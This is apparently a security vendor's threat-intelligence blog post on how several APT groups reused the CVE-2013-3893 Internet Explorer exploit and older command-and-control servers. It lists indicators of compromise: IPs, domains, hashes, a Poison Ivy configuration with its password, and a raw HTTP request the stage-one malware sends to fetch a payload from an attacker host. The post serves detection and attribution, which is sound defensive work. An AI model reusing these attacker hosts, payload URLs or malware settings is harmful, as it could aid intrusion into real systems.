Blog

Hand Me Downs: Exploit and Infrastructure Reuse Among APT Campaigns

Since we first reported on Operation DeputyDog, at least three other Advanced Persistent Threat (APT) campaigns known as Web2Crew, Taidoor, and th3bug have made use of the same exploit to deliver their own payloads to their own targets. It is not uncommon for APT groups to hand-off exploits to others, who are lower on the zero-day food chain – especially after the exploit becomes publicly available. Thus, while the exploit may be the same, the APT groups using them are not otherwise related.

In addition, APT campaigns may reuse existing infrastructure for new attacks. There have been reports that the use of CVE-2013-3893 may have begun in July; however, this determination appears to be based solely on the fact that the CnC infrastructure used in DeputyDog had been previously used by the attackers. We have found no indication that the attackers used CVE-2013-3893 prior to August 23, 2013.

Exploit Reuse

Since the use of CVE-2013-3893 in Operation DeputyDog (which we can confirm happened by at least August 23, 2013), the same exploit was used by different threat actors.

Web2Crew

On September 25, 2013, an actor we call Web2Crew utilized CVE-2013-3893 to drop PoisonIvy (not DeputyDog malware). The exploit was hosted on a server in Taiwan (220.229.238.123) and dropped a PoisonIvy payload (38db830da02df9cf1e467be0d5d9216b) hosted on the same server. In our recent paper, we document how to extract intelligence from Poison Ivy that can be used to cluster activity.

The Poison Ivy binary used in this attack was configured with the following properties:

ID: gua925
Group: gua925
DNS/Port: Direct: login.momoshop.org:443, Direct: 210.17.236.29:443,
Proxy DNS/Port:
Proxy Hijack: No
ActiveX Startup Key:
HKLM Startup Entry:
File Name:
Install Path: C:\Documents and Settings\Administrator\Desktop\runrun.exe
Keylog Path: C:\Documents and Settings\Administrator\Desktop\runrun
Inject: No
Process Mutex: ;A>6gi3lW
Key Logger Mutex:
ActiveX Startup: No
HKLM Startup: No
Copy To: No
Melt: No
Persistence: No
Keylogger: No
Password: LostC0ntrol2013~2014

 

This configuration matches with other Web2Crew particularly ‘gua25’ ID. Some previous Web2Crew Poison Ivy samples have been configured with similar IDs including:

920GUA
GUA4.11
GUA
GUA3.7
GUA613

 

Additionally, the IP address 210.17.236.29 was used to host the command and control server in this attack. A number of known Web2Crew domains previously resolved to this same IP address between August 15 and August 29.

DATE DOMAIN
2013-08-15 flash.wordpreass.net
2013-08-15 search.blogspoct.us
2013-08-15 account.twiitter.us
2013-08-15 search.twiitter.biz
2013-08-15 video.twiitter.biz
2013-08-15 domain.blogspoct.us
2013-08-15 search.wikiipedia.us
2013-08-15 search.youetube.us
2013-08-16 account.twiitter.us
2013-08-16 video.twiitter.biz
2013-08-16 domain.blogspoct.us
2013-08-16 search.blogspoct.us
2013-08-16 search.twiitter.biz
2013-08-21 search.youetube.us
2013-08-29 login.twiitter.us
2013-08-29 account.youetube.us
2013-08-29 login.twiitter.us
2013-08-29 account.youetube.us

We observed the Web2Crew actor targeting a financial institution in this attack as well as in previous attacks.

Taidoor

The same exploit (CVE-2013-3893) has also been used by another, separate APT campaign. By at least September 26, 2013 a compromised Taiwanese Government website was used to host the same exploit, however, the payload in this case was Taidoor (not DeputyDog malware). The decoded payload has an MD5 of 666603bd2073396b7545d8166d862396. The CnC servers are msdn.techsofts.com and 203.114.64.202.

We found another instance of CVE-2013-3893 hosted at www.atmovies[.]com[.]tw/home/temp1.html. This dropped another Taidoor binary with the MD5 of 1b03e3de1ef3e7135fbf9d5ce7e7ccf6. This Taidoor sample connected to a command and control server at 121.254.176.151. We found this sample targeting the same financial services firm targeted by the web2crew actor discussed above.

Both of these samples were the newer versions of Taidoor that we previously described here.

Th3Bug

The actor we refer to as ‘th3bug’ also used CVE-2013-3893 in multiple attacks. Beginning on September 27, compromised websites hosting the Internet Explorer zero-day redirected victims to download a stage one payload (496171867521908540a26dc81b969266) from www.jessearch[.]com/dev/js/27.exe. This payload was XOR’ed with a single byte key of 0×95.

The stage 1 payload then downloaded a PoisonIvy payload (not DeputyDog malware) via the following request:

GET /dev/js/heap.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: www.jessearch.com
Cache-Control: no-cache

 

The PoisonIvy payload then connected to a command and control server at mm.tc.epac.to.

The deobfuscated stage 1 payload has a MD5 of 4017d0baa83c63ceff87cf634890a33f and was compiled on September 27, 2013. This may indicate that the th3bug actor also customized the IE zero-day exploit code on September 27, 2013 – well after the actors responsible for the DeputyDog malware weaponized the same exploit.

Infrastructure Reuse

APT groups also reuse CnC infrastructure. It is not uncommon to see a payload call back to the same CnC, even through it has been distributed via different means. For example, although the first reported use of CVE-2013-3893 in Operation DeputyDog was August 23, 2013, the CnC infrastructure had been used in earlier campaigns.

Specifically, one of the reported DeputyDog command and control servers located at 180.150.228.102 had been used in a previous attack in July 2013. During this previous attack, likely executed by the same actor responsible for the DeputyDog campaign, the 180.150.228.102 IP hosted a PoisonIvy control server and was used to target a gaming company as well as high-tech manufacturing company. There is no evidence to suggest that this July attack using Poison Ivy leveraged the same CVE-2013-3893 exploit.

We also observed usage of Trojan.APT.DeputyDog malware as early as March 26, 2013. In this attack, a Trojan.APT.DeputyDog binary (b1634ce7e8928dfdc3b3ada3ab828e84) was deployed against targets in both the high-technology manufacturing and finance verticals. This DeputyDog binary called back to a command and control server at www.jusched.net. There is also no evidence in this case to suggest that this attack used the CVE-2013-3893 exploit.

This malware family and the CnC infrastructure is part of an ongoing campaign. Therefore, the fact that this infrastructure was active prior to the first reported use of CVE-2013-3893 does not necessarily indicate that this particular exploit was previously used. The actor responsible for the DeputyDog campaign employs a multiple of malware tools and utilizes a diverse command and control infrastructure.

Conclusion

The activity associated with specific APT campaigns can be clustered and tracked by unique indicators. There are a variety of different campaigns that sometimes make use of the same malware (or sometimes widely available malware such as PoisonIvy) and the same exploits. It is not uncommon for zero-day exploits to be handed down to additional APT campaigns after they have already been used.

  • The first observed usage of CVE-2013-3893, in Operation Deputy Dog, remains August 23, 2013. However, the C2 infrastructure had been used in previous attacks in July 2013.
  • The CVE-2013-3893 has been subsequently used by at least three other APT campaigns: Taidoor, th3bug, and Web2Crew. However, other than the common use of the same exploit, these campaigns are otherwise unrelated.
  • We expect that CVE-2013-3893 will continue to be handed down to additional APT campaigns and may eventually find its way into the cyber-crime underground.